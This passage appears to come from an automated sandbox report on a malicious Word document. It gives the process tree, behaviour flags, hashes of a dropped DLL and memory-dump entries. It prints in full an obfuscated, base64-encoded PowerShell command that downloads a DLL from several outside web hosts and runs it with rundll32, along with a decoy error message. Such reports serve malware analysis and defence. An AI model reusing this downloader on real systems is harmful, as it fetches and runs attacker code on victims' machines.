nAF8AdgAsACAAJABVAHkAdgB6AHkAeQBxACkAOwAkAFIAcwAyAG0ANQB5ADcAPQAoACgAJwBNACcAKwAnAHQAagAnACkAKwAoACcAYgAnACsAJwBwAHQAdQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABVAHkAdgB6AHkAeQBxACkALgAiAEwARQBOAGcAYABUAGgAIgAgAC0AZwBlACAANAAwADQAMAAwACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuAGQAbAAnACsAJwBsADMAMgAuAGUAeABlACcAKQAgACQAVQB5AHYAegB5AHkAcQAsADAAOwAkAFIAeAA1AGYAcwBnAGcAPQAoACgAJwBBAHMAJwArACcAbgBrACcAKQArACgAJwBuACcAKwAnAHEAdQAnACkAKQA7AGIAcgBlAGEAawA7ACQATQBpADYAZwA0ADYAMAA9ACgAKAAnAFMAJwArACcANgB6ACcAKQArACcAYQAnACsAKAAnAG0AJwArACcAaQBiACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAF8AMAA4ADYAXwBnAD0AKAAoACcATwAnACsAJwA5ADUAZwAnACkAKwAnAHQAJwArACcAawBkACcAKQA=1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msg.exemsg Admin /v Word experienced an error trying to open the file.2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwersheLL -w hidden -ENCOD UwBWACAAIAB0ADQAQgA3AGsAIAAoACAAWwBUAFkAUABFAF0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9AHsAMwB9ACIALQBmACcAbwAuAEQAaQAnACwAJwBzAFkAcwBUAEUATQAnACwAJwAuAGkAJwAsACcAUgBlAGMAdABvAHIAWQAnACkAIAAgACkAOwAgACAAIAAgACQARgAzADUAQwA4AFgAIAAgAD0AIAAgAFsAdAB5AFAARQBdACgAIgB7ADQAfQB7ADEAfQB7ADIAfQB7ADcAfQB7ADAAfQB7ADYAfQB7ADUAfQB7ADMAfQB7ADgAfQAiACAALQBmACAAJwBDAGUAcABPAEkAJwAsACcAeQBzAFQAZQBtAC4AbgBFAFQALgBzAEUAJwAsACcAUgBWACcALAAnAEEATgBBAGcAZQAnACwAJwBzACcALAAnAHQATQAnACwAJwBOACcALAAnAEkAJwAsACcAUgAnACkAOwAgACAAJABYAGsAYgA3AHIANQBsAD0AKAAoACcAQgA3ACcAKwAnAGYAJwApACsAJwBfACcAKwAoACcAeQAnACsAJwBnAHkAJwApACkAOwAkAFUAZwBsAHAAeABtAGcAPQAkAE0AXwBzADAAeABxADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFQANAAxAGIAbwBpAGEAOwAkAEMAcAB0AG4AawBrAGUAPQAoACgAJwBLADAAJwArACcAMAAnACkAKwAoACcAaQAnACsAJwB6AGUAdgAnACkAKQA7ACAAKAAgACAAZwBFAHQALQB2AGEAcgBJAEEAYgBMAEUAIAAgAHQANABiADcASwAgACAALQB2AEEATABVAGUAbwBuAEwAeQAgACAAKQA6ADoAIgBjAHIARQBBAHQAYABFAGAARABpAFIAYABFAEMAYABUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACgAJwBFADEAYgAnACsAJwBhACcAKQArACcAZAA1ACcAKwAnAGUAewAwAH0AUgB2AG0AJwArACcAbgAnACsAJwA3AGsAZAB7ADAAfQAnACkALQBGACAAIABbAEMASABBAFIAXQA5ADIAKQApADsAJABZADcANwA4ADMAZQBqAD0AKAAnAEwAcQAnACsAJwBmAHoAJwArACgAJwBlACcAKwAnAGsAegAnACkAKQA7ACAAIAAkAEYAMwA1AGMAOABYADoAOgAiAFMARQBgAEMAdQBgAFIAaQBUAGAAeQBwAHIAYABPAFQATwBjAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwB5ADgAaQB5AGsAZwA9ACgAKAAnAFcAZgAnACsAJwB1AHkAJwApACsAJwByACcAKwAnAHcAOAAnACkAOwAkAEsANgBiAG8AdwAxAHcAIAA9ACAAKAAnAEYAaAAnACsAKAAnAGQAdAAnACsAJwBtAGUAJwApACsAJwAxADAAJwApADsAJABCADkANgBmAHAAagBlAD0AKAAoACcARABuAGEAJwArACcAaAAnACkAKwAnAG4ANQAnACsAJwB4ACcAKQA7ACQAUgBiAHgAdQB2AF8ANQA9ACgAJwBOACcAKwAoACcAcwA4AGgAJwArACcAZgByACcAKQArACcAMgAnACkAOwAkAFUAeQB2AHoAeQB5AHEAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBFADEAYgAnACsAKAAnAGEAJwArACcAZAA1AGUAJwApACsAJwB7ADAAJwArACcAfQAnACsAKAAnAFIAdgBtAG4AJwArACcANwBrACcAKQArACcAZAB7ADAAfQAnACkALQBGAFsAYwBIAGEAcgBdADkAMgApACsAJABLADYAYgBvAHcAMQB3ACsAKAAoACcALgBkACcAKwAnAGwAJwApACsAJwBsACcAKQA7ACQAWQBiAHcAbgBsAGIAcQA9ACgAKAAnAEwAbgBtACcAKwAnAGoANwAnACkAKwAnAG8AJwArACcANQAnACkAOwAkAEYAawA3AGUAYQByAF8APQBOAGAAZQBXAC0AYABvAGAAQgBqAEUAYwB0ACAATgBlAFQALgB3AGUAQgBDAGwASQBlAE4AVAA7ACQATwBtAGkAcQAxAHMAaQA9ACgAKAAnAGgAdAAnACsAKAAnAHQAcAAnACsAJwA6AFEAJwApACsAJwApACcAKwAoACgAJwAoAHEAZAAnACsAJwBkACkAKAAnACkAKQArACgAKAAnAFEAKQAnACsAJwAoAHEAZAAnACkAKQArACgAKAAnAGQAKQAnACsAJwAoAHYAJwApACkAKwAoACgAJwBlAHYAJwArACcAYQAuAHYAbgBRACcAKwAnACkAKAAnACkAKQArACgAKAAnAHEAZAAnACsAJwBkACkAKAAnACkAKQArACgAJwB6AG4AdABrACcAKwAnADAAJwApACsAKAAnADcAMAAuACcAKwAnAHAAbgAnACkAKwAnAGcAQAAnACsAKAAnAGgAdAAnACsAJwB0AHAAOgBRACcAKQArACgAKAAnACkAKAAnACkAKQArACgAJwBxACcAKwAnAGQAZAAnACkAKwAoACgAJwApACgAJwApACkAKwAnAFEAJwArACgAKAAnACkAKAAnACkAKQArACcAcQAnACsAJwBkACcAKwAnAGQAJwArACcAKQAnACsAKAAoACcAKAAnACsAJwBoAGEAJwApACkAKwAoACcAcgBkACcAKwAnAG0AJwApACsAKAAnAGUAJwArACcAZAAtACcAKQArACcAZQAnACsAJwBnACcAKwAoACcALgBjACcAKwAnAG8AJwApACsAJwBtACcAKwAoACgAJwBRACkAJwApACkAKwAoACgAJwAoAHEAZAAnACsAJwBkACkAJwArACcAKABvACcAKQApACsAKAAnADcAJwArACcANgBuAHgAJwApACsAJwBhAC4AJwArACgAJwBwAG4AJwArACcAZwAnACkAKwAnAEAAaAAnACsAJwB0AHQAJwArACgAJwBwACcAKwAnADoAUQAnACkAKwAoACgAJwApACgAcQAnACsAJwBkACcAKwAnAGQAKQAnACkAKQArACgAKAAnACgAUQAnACkAKQArACcAKQAnACsAKAAnACgAJwArACcAcQBkAGQAKQAnACkAKwAoACgAJwAoAGkAJwApACkAKwAnAHMAbAAnACsAJwBhACcAKwAnAG0AJwArACgAJwBhAGIAbwB1ACcAKwAnAHQAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBRACcAKwAnACkAKABxAGQAZAAnACkAKQArACgAKAAnACkAKABnAGEAMQAnACsAJwA0ADAAJwArACcAaAA3AGwALgB6ACcAKwAnAGkAcAAnACkAKQArACcAQABoACcAKwAoACcAdAB0ACcAKwAnAHAAJwApACsAJwA6ACcAKwAoACgAJwBRACkAJwApACkAKwAoACgAJwAoAHEAJwArACcAZAAnACkAKQArACgAKAAnAGQAKQAnACkAKQArACcAKAAnACsAKAAoACcAUQApACgAcQAnACsAJwBkAGQAKQAoACcAKQApACsAKAAnAGYAZQByACcAKwAnAHIAZQB0AGUAJwArACcAYwAnACkAKwAnAC4AYwAnACsAKAAoACcAbwBtAFEAKQAoACcAKwAnAHEAZAAnACkAKQArACgAKAAnAGQAKQAoAGMAMgAnACsAJwBlAGkAdgAnACsAJwBzACcAKwAnAHMAdwBnAC4AJwArACcAcgBhAHIAJwApACkAKwAoACcAQAAnACsAJwBoAHQAdAAnACkAKwAnAHAAOgAnACsAKAAoACcAUQApACcAKQApACsAKAAnACgAcQBkAGQAJwArACcAKQAnACkAKwAnACgAJwArACgAKAAnAFEAKQAnACkAKQArACcAKAAnACsAJwBxACcAKwAoACgAJwBkAGQAJwArACcAKQAnACkAKQArACgAJwAoACcAKwAnAHIAYQBzAGEAZABiAGEAcgAuACcAKwAnAGkAcgBRACkAJwApACsAKAAoACcAKAAnACsAJwBxAGQAJwApACkAKwAnAGQAJwArACgAKAAnACkAJwArACcAKAB0ADYAeQBzACcAKwAnAHcAYgAuAHAAJwApACkAKwAoACcAZABmACcAKwAnAEAAJwApACsAJwBoAHQAJwArACcAdAAnACsAJwBwADoAJwArACgAKAAnAFEAKQAnACkAKQArACgAJwAoAHEAZAAnACsAJwBkACcAKwAnACkAKABRACkAJwApACsAKAAoACcAKABxACcAKQApACsAJwBkACcAKwAoACgAJwBkACkAJwApACkAKwAoACgAJwAoACcAKwAnAHMAZQBuACcAKwAnAGkAbwAnACkAKQArACcAcgBjACcAKwAnAGEAcgAnACsAJwBlAGMAJwArACgAJwBvAG0AcABhACcAKwAnAHMAJwApACsAJwBzACcAKwAoACcALgAnACsAJwBpAG4AJwApACsAKAAnAGkAJwArACcAZgBhACcAKQArACcAcgBlACcAKwAoACcAcwB3ACcAKwAnAG8AcgBrACcAKQArACcAcwAnACsAJwBoAG8AJwArACcAcAAnACsAJwBzACcAKwAnAC4AJwArACcAYwAnACsAKAAoACcAbwBtAFEAJwArACcAKQAnACkAKQArACgAKAAnACgAcQBkAGQAJwArACcAKQAoACcAKQApACsAKAAnAHYAJwArACcAcgA2AGUAYgB6ACcAKwAnAG8AbABkAC4AJwArACcAcABuAGcAJwApACsAJwBAACcAKQApAC4AIgBSAGUAcABMAGEAYABDAEUAIgAoACgAKAAoACgAJwBRACcAKwAnACkAKAAnACkAKQArACgAKAAnAHEAZAAnACsAJwBkACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAFMAUABgAEwAaQB0ACIAKAAkAEwANQB5AGQAYwBvAHYAIAArACAAJABVAGcAbABwAHgAbQBnACAAKwAgACQAQwBrAHgAOABuADkAZQApADsAJABQAGMAagBsAGgAawBvAD0AKAAnAFAAMQAnACsAKAAnAGUAJwArACcAaQB4AHUAeQAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVQB5ADMAOQBnAF8AdgAgAGkAbgAgACQATwBtAGkAcQAxAHMAaQAgAHwAIABTAGAATwBgAFIAYABUAC0AbwBiAGoAYABFAGMAVAAgAHsAZwBFAGAAVAAtAFIAQQBgAE4AZABgAG8AbQB9ACkAewB0AHIAeQB7ACQARgBrADcAZQBhAHIAXwAuACIARABgAG8AVwBuAEwATwBhAGAARABGAGAASQBsAEUAIgAoACQAVQB5ADMAOQBnAF8AdgAsACAAJABVAHkAdgB6AHkAeQBxACkAOwAkAFIAcwAyAG0ANQB5ADcAPQAoACgAJwBNACcAKwAnAHQAagAnACkAKwAoACcAYgAnACsAJwBwAHQAdQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABVAHkAdgB6AHkAeQBxACkALgAiAEwARQBOAGcAYABUAGgAIgAgAC0AZwBlACAANAAwADQAMAAwACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuAGQAbAAnACsAJwBsADMAMgAuAGUAeABlACcAKQAgACQAVQB5AHYAegB5AHkAcQAsADAAOwAkAFIAeAA1AGYAcwBnAGcAPQAoACgAJwBBAHMAJwArACcAbgBrACcAKQArACgAJwBuACcAKwAnAHEAdQAnACkAKQA7AGIAcgBlAGEAawA7ACQATQBpADYAZwA0ADYAMAA9ACgAKAAnAFMAJwArACcANgB6ACcAKQArACcAYQAnACsAKAAnAG0AJwArACcAaQBiACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAF8AMAA4ADYAXwBnAD0AKAAoACcATwAnACsAJwA5ADUAZwAnACkAKwAnAHQAJwArACcAawBkACcAKQA=2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\E1bad5e\Rvmn7kd\Fhdtme10.dll 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\E1bad5e\Rvmn7kd\Fhdtme10.dll 04⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\E1bad5e\Rvmn7kd\Fhdtme10.dllMD5
429d63af6c900c0c2f7c2b82dec86a7e
SHA16f3c788b9223c6d99d34235c86bcc00056a2c73f
SHA256b6c782d71a48aaf6b23d0c9f2f6490c008d8f3f87d43b3c1a6f18343ddc63874
SHA5120f1cc54093f788e6549cc0149f2d0d3c52e82b76222a4563c995c3bc8c207f4a2583f585b4f0ae522c85a5994a9953238c094e589cfcab3f4688ac9dd244ff4c
-
\Users\Admin\E1bad5e\Rvmn7kd\Fhdtme10.dllMD5
429d63af6c900c0c2f7c2b82dec86a7e
SHA16f3c788b9223c6d99d34235c86bcc00056a2c73f
SHA256b6c782d71a48aaf6b23d0c9f2f6490c008d8f3f87d43b3c1a6f18343ddc63874
SHA5120f1cc54093f788e6549cc0149f2d0d3c52e82b76222a4563c995c3bc8c207f4a2583f585b4f0ae522c85a5994a9953238c094e589cfcab3f4688ac9dd244ff4c
-
\Users\Admin\E1bad5e\Rvmn7kd\Fhdtme10.dllMD5
429d63af6c900c0c2f7c2b82dec86a7e
SHA16f3c788b9223c6d99d34235c86bcc00056a2c73f
SHA256b6c782d71a48aaf6b23d0c9f2f6490c008d8f3f87d43b3c1a6f18343ddc63874
SHA5120f1cc54093f788e6549cc0149f2d0d3c52e82b76222a4563c995c3bc8c207f4a2583f585b4f0ae522c85a5994a9953238c094e589cfcab3f4688ac9dd244ff4c
-
\Users\Admin\E1bad5e\Rvmn7kd\Fhdtme10.dllMD5
429d63af6c900c0c2f7c2b82dec86a7e
SHA16f3c788b9223c6d99d34235c86bcc00056a2c73f
SHA256b6c782d71a48aaf6b23d0c9f2f6490c008d8f3f87d43b3c1a6f18343ddc63874
SHA5120f1cc54093f788e6549cc0149f2d0d3c52e82b76222a4563c995c3bc8c207f4a2583f585b4f0ae522c85a5994a9953238c094e589cfcab3f4688ac9dd244ff4c
-
\Users\Admin\E1bad5e\Rvmn7kd\Fhdtme10.dllMD5
429d63af6c900c0c2f7c2b82dec86a7e
SHA16f3c788b9223c6d99d34235c86bcc00056a2c73f
SHA256b6c782d71a48aaf6b23d0c9f2f6490c008d8f3f87d43b3c1a6f18343ddc63874
SHA5120f1cc54093f788e6549cc0149f2d0d3c52e82b76222a4563c995c3bc8c207f4a2583f585b4f0ae522c85a5994a9953238c094e589cfcab3f4688ac9dd244ff4c
-
memory/108-21-0x000007FEF6930000-0x000007FEF6BAA000-memory.dmpFilesize
2.5MB
-
memory/584-10-0x000000001C430000-0x000000001C431000-memory.dmpFilesize
4KB
-
memory/584-6-0x0000000001F60000-0x0000000001F61000-memory.dmpFilesize
4KB
-
memory/584-8-0x00000000020B0000-0x00000000020B1000-memory.dmpFilesize
4KB
-
memory/584-9-0x0000000001EC0000-0x0000000001EC1000-memory.dmpFilesize
4KB
-
memory/584-7-0x000000001AC50000-0x000000001AC51000-memory.dmpFilesize
4KB
-
memory/584-4-0x0000000000000000-mapping.dmp
-
memory/584-12-0x000000001C500000-0x000000001C501000-memory.dmpFilesize
4KB
-
memory/584-5-0x000007FEF5960000-0x000007FEF634C000-memory.dmpFilesize
9.9MB
-
memory/1056-0-0x0000000000554000-0x0000000000556000-memory.dmpFilesize
8KB
-
memory/1056-2-0x0000000005B0E000-0x0000000005B10000-memory.dmpFilesize
8KB
-
memory/1056-1-0x0000000006670000-0x0000000006674000-memory.dmpFilesize
16KB
-
memory/1276-11-0x0000000000000000-mapping.dmp
-
memory/1604-13-0x0000000000000000-mapping.dmp
-
memory/1680-3-0x0000000000000000-mapping.dmp
-
memory/2024-15-0x0000000000000000-mapping.dmp
-
memory/2024-20-0x00000000007F0000-0x000000000082D000-memory.dmpFilesize
244KB